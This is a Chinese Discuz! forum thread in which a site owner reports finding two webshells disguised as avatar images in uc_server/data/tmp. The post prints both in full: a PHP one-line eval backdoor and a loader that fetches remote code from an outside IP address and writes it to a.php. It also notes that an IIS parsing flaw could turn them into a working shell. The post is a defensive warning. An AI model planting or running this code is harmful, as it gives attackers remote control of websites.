久久久久av_欧美日韩一区二区在线_国产精品三区四区_日韩中字在线

Discuz! 官方交流社區(qū)

標(biāo)題: uc_server\data\tmp被上傳木馬文件建議自查 [打印本頁(yè)]

作者: onlygod 時(shí)間: 2019-11-14 16:53
標(biāo)題: uc_server\data\tmp被上傳木馬文件建議自查
(, 下載次數(shù): 21)
今天網(wǎng)站搬家，順手用最新版的D盾掃描了一下，發(fā)現(xiàn)兩個(gè)可疑文件，圖片格式。

路徑為：uc_server\data\tmp

將格式圖片格式的后綴改為 .php，用記事本打開(kāi)，發(fā)現(xiàn)一句話木馬，兩個(gè)文件分別如下：

<?php @eval($_POST['1']);?>

復(fù)制代碼

<script language="php"> $save=file_get_contents('http://103.198.194.134/php/xz.txt'); file_put_contents('a.php',$save) ;</script>

復(fù)制代碼

目前暫時(shí)沒(méi)掃出其他木馬，懷疑上傳木馬后并沒(méi)有成功執(zhí)行。

文件名分別為：
upload37372
upload29060

后面的數(shù)字應(yīng)該是用戶ID，建議將圖片改成隨機(jī)數(shù)字命名，否則容易被黑客利用。
IIS的解析漏洞，配合這個(gè)，有可能能拿下webshell。

-------建議大家自查一下。不知道新版有木有這個(gè)漏洞，知道的大神說(shuō)下。

作者: 耗子 時(shí)間: 2019-11-14 17:43
這種情況一般都是頭像進(jìn)來(lái)的，做好防護(hù)措施尤其服務(wù)器廣告IIS有這個(gè)漏洞包括這個(gè)是PHP的漏洞

歡迎光臨 Discuz! 官方交流社區(qū) (http://www.9999xn.com/)